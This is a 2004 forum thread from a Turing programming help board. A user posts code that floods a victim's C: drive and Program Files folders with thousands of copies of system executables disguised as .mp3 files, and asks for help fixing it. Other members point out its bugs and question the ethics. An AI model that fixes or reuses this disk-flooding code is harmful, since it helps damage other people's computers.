Programming C, C++, Java, PHP, Ruby, Turing, VB
Computer Science Canada 
Programming C, C++, Java, PHP, Ruby, Turing, VB  

Username:   Password: 
 RegisterRegister   
 Lame Virus Type Thing
Index -> Programming, Turing -> Turing Help
View previous topic Printable versionDownload TopicSubscribe to this topicPrivate MessagesRefresh page View next topic
jonos

PostPosted: Mon Jan 26, 2004 11:31 am   Post subject: Lame Virus Type Thing

ok, i made this to duplicate two files from the windows directory that i think everyone has, into all the files of someones c drive and program files, but it doesn't put them in all of the program file directories. Can someone help me with this problem. If you're going to test it (i for some reason did), you might want to change the number of times the files are duplicated.

code:

var dirC : int
    dirC := Dir.Open ("c:\\")
    assert dirC > 0
    loop
        fileName := Dir.Get (dirC)
        exit when fileName = ""
        put fileName
        for counter : 1 .. 3000
            File.Copy ("c:\\WINDOWS\\NOTEPAD.EXE", "c:\\" + fileName + "\\client.proc_" + intstr (counter) + ".mp3")
            File.Copy ("c:\\WINDOWS\\explorer.exe", "c:\\" + fileName + "\\client.proc_" + intstr (counter) + ".mp3")
        end for
    end loop
    Dir.Close (dirC)

var dirPFiles : int
    dirPFiles := Dir.Open ("c:\\Program Files\\")
    assert dirPFiles > 0
    loop
        fileName2 := Dir.Get (dirPFiles)
        exit when fileName2 = ""
        put fileName2
        for counter : 1 .. 3000
            File.Copy ("c:\\WINDOWS\\explorer.exe", "c:\\Program Files\\" + fileName + "\\client.proc_" + intstr (counter) + ".mp3 ")
            File.Copy ("c:\\WINDOWS\\NOTEPAD.EXE", "c:\\Program Files\\" + fileName2 + "\\client.proc_" + intstr (counter) + ".mp3 ")
        end for
    end loop
    Dir.Close (dirPFiles)
[/code]
Sponsor
Sponsor
Sponsor
sponsor
Dan

PostPosted: Mon Jan 26, 2004 12:22 pm   Post subject: (No subject)

intresting atmpeted but it whoduld not copy over explorer.exe b/c they whould be ruing it...

also not every one uses c drive or windows/ as there windows floder
Computer Science Canada Help with programming in C, C++, Java, PHP, Ruby, Turing, VB and more!
jonos

PostPosted: Mon Jan 26, 2004 2:52 pm   Post subject: (No subject)

im sorry, but i did not quite get what you meant. i think the explorer thing works, but i only tested the program with the notepad thing so im not sure. I made the program for a computer that i know has their windows folder in the c drive.
Mazer

PostPosted: Mon Jan 26, 2004 3:58 pm   Post subject: (No subject)

Hacker Dan wrote:
intresting atmpeted but it whoduld not copy over explorer.exe b/c they whould be ruing it...

also not every one uses c drive or windows/ as there windows floder

Here's a (rought) translation for you, jonos:
Quote:
Interesting attempt but it wouldn't copy over explorer.exe because they would be running it...

also not everyone uses c drive or windows/ as their windows folder

What he means is that, you won't be able to delete or replace the explorer.exe file because it will pretty much always be in use. And while most people do install to c:\windows, there could always be one or two weirdos that choose to install it somewhere else (like c:\stuff\why\whocares\windows\ for example). But if your using it on a computer that you know the location of the windows folder for sure, that shouldn't be a problem.
jonos

PostPosted: Mon Jan 26, 2004 5:07 pm   Post subject: (No subject)

so would you have any advice on what large file that everyone has to duplicate?
shorthair

PostPosted: Mon Jan 26, 2004 5:45 pm   Post subject: (No subject)

okayEthices here , how does a virus land in turing help , i mean TURING HELP , " HELP " , come on guys this dosent help anyone ,
sport

PostPosted: Mon Jan 26, 2004 6:14 pm   Post subject: (No subject)

Hey careful, being a virus is not a joke and you can ruin your system if you forget and run it.
jonos

PostPosted: Mon Jan 26, 2004 6:32 pm   Post subject: (No subject)

yeah, ill stop posting this kind of stuff, i was just wondering why it wasn't working. actually, in my compsci class my teacher spent a bit talking about ethics and programming... i guess im a bad person.
Sponsor
Sponsor
Sponsor
sponsor
shorthair

PostPosted: Mon Jan 26, 2004 6:50 pm   Post subject: (No subject)

not at all , jsuty dont post it in help, put her in source , or spam , or submissions , just dont think its very helpful , if you see where im coming from
jonos

PostPosted: Mon Jan 26, 2004 7:14 pm   Post subject: (No subject)

yeah, perfectly, i just needed help with the problem, ill put it in submissions or something next time
Dan

PostPosted: Tue Jan 27, 2004 1:19 pm   Post subject: (No subject)

what wrong with viurs? and sory about that post, i should not post when i am out of it, lol.

virus are fine as long as u dont use them on other poleop Twisted Evil

i think they are very educationl
Computer Science Canada Help with programming in C, C++, Java, PHP, Ruby, Turing, VB and more!
jonos

PostPosted: Tue Jan 27, 2004 1:22 pm   Post subject: (No subject)

the thing is i don't even think that is a virus, just a lame way of pissing some people off.
   Index -> Programming, Turing -> Turing Help
View previous topic Tell A FriendPrintable versionDownload TopicSubscribe to this topicPrivate MessagesRefresh page View next topic

Page 1 of 1  [ 12 Posts ]
Jump to:   

Style:  
Search: